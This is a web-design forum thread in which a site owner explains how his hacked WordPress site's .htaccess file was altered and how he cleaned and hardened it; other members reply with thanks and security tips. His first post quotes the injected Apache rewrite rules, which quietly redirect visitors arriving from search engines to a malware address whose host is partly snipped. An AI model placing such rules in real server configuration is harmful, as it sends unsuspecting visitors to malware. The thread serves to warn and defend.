How to Customize a WordPress Theme


Results 1 to 7 of 7

Thread: Hacked Websites

  1. #1
    Join Date
    Jan 2010
    Location
    Reno, NV
    Posts
    131

    Exclamation Hacked Websites

    Hello Everyone,

    An incident occurred which turned out to be a learning experience and has prompted me to write about it here in the forums.

    A few months ago, my website was hacked and mildly defaced. I discovered it within a few hours and it took all of about 30 seconds to upload the backup I kept however it wasn't until yesterday that I made a discovery on what else had changed. My .htaccess file had been altered. In fact because this file had been altered, my site was able to be used to redirect others to upload and install malware undetected.

    Now for those that have gone to my site from any links I have provided in forums or directly, you were safe. However, if someone was looking for images in google and had gone to my site from searching the images or through aol or msn, lets hope their anti-virus programs were up to date. When I tested the redirected link, my anti-virus, (I use Avast) went off warning me and blocking the site. Let me explain...

    .htaccess is a configuration file for use on web servers running the Apache Web Server software. When a .htaccess file is placed in a directory which is in turn 'loaded via the Apache Web Server', then the .htaccess file is detected and executed by the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features that the Apache Web Server software has to offer. These facilities include basic redirect functionality, for instance if a 404 file not found error occurs, or for more advanced functions such as content password protection or image hot link prevention. More about the .htaccess file can be found at http://www.javascriptkit.com/howto/htaccess.shtml

    Before my site had been hacked, my .htaccess file had read only:

    <IfModule mod_php5.c>
    # mod_suPHP is active - php.ini overrides must be within these tags or in your local php.ini
    # To set a recursive php.ini, add the following line to the top of this file:
    # SuPHP_ConfigPath /home/yourusername/foldercontainingphp.ini


    </IfModule>


    After the hack these lines were added to the file:

    #Options All
    #AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
    #RewriteEngine On
    #RewriteOptions inherit
    #RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    #RewriteRule .* <snip> search-box.in/in.cgi?4&parameter=u [R,L]

    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>

    The top set of lines redirect users coming to the site from the above search engines to the address on the last line. This might explain also why I was not showing up in the yahoo search engine.

    I have snipped out the HTTP reference from the #RewriteRule to prevent this from becoming a link in this message as it contains malware.

    In the last set of lines the line <Files 403.shtml> indicates the page denied users are directed too. (403 - Forbidden)

    The next section, order allow,deny allow from all: Indicates that all hosts are allowed access.

    It is unknown how the site became infected however, research showed that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit. To keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

    So what changes did I make to the .htaccess file?

    First I deleted all of the malicious lines redirecting users. Then I changed the next section to read:

    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    This helps prevent anyone from accessing the file.

    I also added some more lines to the file that blocks bad bots and site rippers making it harder to harvest email addresses, jack up bandwidth and resources and steal the code from my site.

    This information can be found at: http://www.javascriptkit.com/howto/htaccess13.shtml

    As malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. It's a good idea to check your .htaccess file periodically if you have one and not just back up your site but back up that .htaccess file as well so you have something to compare it with.

  2. #2
    Join Date
    Mar 2008
    Location
    Jonesboro
    Posts
    544

    Default

    Thank you Steve for the information and just shows how this hackers do not have anything better to do with their skills.

  3. #3
    Join Date
    Jul 2008
    Posts
    629

    Default

    Wow, that is great information. Im going to check out my files.
    Photoshop, Dreamweaver, Illustrator, After Effects Tutorials at Youtube | Website | Twitter
    Do you take great photos? Consider selling them at Dreamstime or Shutterstock.
    YouTube Partnership with Makerstudios: http://awe.sm/bDxZW

  4. #4
    Join Date
    Jul 2007
    Location
    Canada
    Posts
    5,209

    Default

    One thing we can all learn from this is to protect both your web site and your local systems. It is interesting how malware on your local system can end up doing so much damage to your web site.

    Always have malware protection installed on your computer, and perform regular scans to ensure your computer is clean.

  5. #5

    Default

    Thanks. This is really good to know.
    meloncholy - A state of mind brought about by eating too much soft fruit

    I make web things. Sometimes pretty ones.

  6. #6
    Join Date
    Jan 2010
    Location
    Reno, NV
    Posts
    131

    Default

    One more thing that I failed to mention. ALWAYS make sure your applications have the latest security patches. I use Dreamweaver to edit my website and while I never did find any malware at the time on my computer. Adobe did have a series of breaches in their software applications that they patched and I'm pretty sure that is how the hack occurred as it happened during that period of time. Upon discovery of the hack, I of course immediately changed the password to the account. Once the patch was applied, the password was again changed.

    Also, as a matter of security, the password gets changed monthly.

  7. #7
    Join Date
    Jul 2007
    Location
    Canada
    Posts
    5,209

    Default

    Talking about Adobe's software patches brought up something that I installed on my machine last night. I installed Secunia's PSI tool (http://secunia.com/vulnerability_scanning/personal). This tool scans my machine and looks for applications that aren't patched, at end-of-life, or insecure, to help me determine what applications I need to update. Very useful. Secunia also contains a huge database of applications and displays information about any vulnerabilities that exist for them, such as with web browsers.

    Quite useful to keep on top of application issues.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •